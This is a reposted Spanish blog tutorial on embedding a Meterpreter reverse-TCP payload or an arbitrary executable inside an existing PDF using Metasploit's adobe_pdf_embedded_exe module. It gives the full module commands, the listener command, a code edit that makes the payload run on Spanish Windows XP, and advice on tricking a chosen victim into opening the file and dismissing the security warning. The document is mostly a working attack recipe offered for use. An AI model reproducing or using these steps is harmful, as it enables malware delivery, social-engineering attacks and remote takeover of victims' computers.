Banner 1

Embebiendo un Ejecutable dentro de un PDF con MetaSploit

Articulo muy interezante encontrado via kunfoosion por eso lo comparto igual al final dejo el link para que visiten su blog :D

-------------------------------------------------------------------------------------------------

En este artículo, vamos a ver como embeber un archivo ejecutable ".exe", dentro de un archivo PDF, utilizando el módulo "adobe_pdf_embedded_exe" de MetaSploit.

Leyendo el blog de F-Secure, me encontré con un post sobre PDF maliciosos que estaban siendo utilizados para ataques de espionaje. Al ser abiertos, dropeaban y corrían un archivo ejecutable, en este caso un Poison Ivy que luego se conectaba a una IP de Singapore.


MetaSploit: adobe_pdf_embedded_exe

Para testear el comportamiento de nuestros usuarios, ante una amenaza similar a esta, podemos replicar este ataque con el módulo "adobe_pdf_embedded_exe" de MetaSploit, en donde vamos a embeber un archivo ejecutable ".exe", o un payload de MetaSploit, dentro de un archivo PDF.

Por supuesto vamos a necesitar realizar un poco de ingeniería social, primero para que la víctima abra el PDF que le enviamos, y luego, para que ignore el warning de seguridad que aparecerá cuando se intente ejecutar el payload malicioso.

Lo interesante del módulo "adobe_pdf_embedded_exe", es que nos permitirá embeber el payload en cualquier PDF existente, lo que nos allanará el camino para realizar la ingeniería social. Por ejemplo, podríamos buscar PDF's existentes de una víctima en particular en Google:


Otra cosa a tener en cuenta, es que este módulo tiene rank de Excellent, por lo que es una buena opción, ante otros exploits para client side attacks que no son tan estables.


Embebiendo un Payload de MetaSploit en un PDF

Para embeber un payload, simplemente lo configuramos como a cualquier otro exploit, solamente debemos tener en cuenta que en la opción "INFILENAME" vamos a poner el path al archivo PDF que queremos utilizar, y en la opción "FILENAME", el nombre del nuevo archivo PDF con el payload embebido:

use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/programa.pdf
set FILENAME evil.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit

Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E

Cuando la víctima abra el archivo PDF, verá un warning:



Al momento de presion "Open", el payload será dropeado en el sistema, y un script intentará correrlo. Como el target de este módulo es Windows XP SP3 English, vemos en el warning que el payload es buscado dentro de "Desktop", "My Documents" y "Documents".

Para que funcione con un XP en español, debemos agregar en el código del módulo, los directorios "Escritorio" y "Mis Documentos", y volver a generar el PDF:
# editamos el módulo:
/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

# reemplazamos la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents" ]

# por la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]

Ahora si, se ejecutará el payload, y como podemos ver, lo hicimos con un Windows XP SP2 en Español:


Si vimos atentamente el warning, pudimos apreciar que al ejecutar el payload dropeado, lo hace de esta forma: "start programa.pdf".

El archivo que enviamos a la víctima se llamaba "evil.pdf", cuando dropeo el payload lo hizo con el nombre "programa.pdf", como el nombre del PDF verdadero que configuramos oportunamente. En realidad, "programa.pdf" es un archivo ".exe", con el payload de Meterpreter, pero como el comando "start" puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.


Embebiendo un Ejecutable en un PDF

Para embeber un archivo ejecutable dentro de nuestro PDF, simplemente configuramos la opción "EXENAME". En este caso estamos embebiendo la famosa calculadora de Windows "calc.exe":

set EXENAME /tmp/calc.exe
set INFILENAME /tmp/programa.pdf
exploit

Si bien el PAYLOAD no debería ser necesario configurarlo, ya que no estamos embebiendo un payload sino el ejecutable "calc.exe", por alguna razón si no lo configuramos no nos deja seguir.

set PAYLOAD windows/shell/bind_tcp
Cuando la víctima abra el archivo PDF, verá el warning pero ya con los directorios que agregamos:


Una vez que la víctima presione "Open", se correrá el archivo ejecutable que embebimos, el famoso "calc.exe":


Eso es todo amigos :-)

fuente:

http://kungfoosion.blogspot.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KungFooSion+%28KungFooSion%29

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay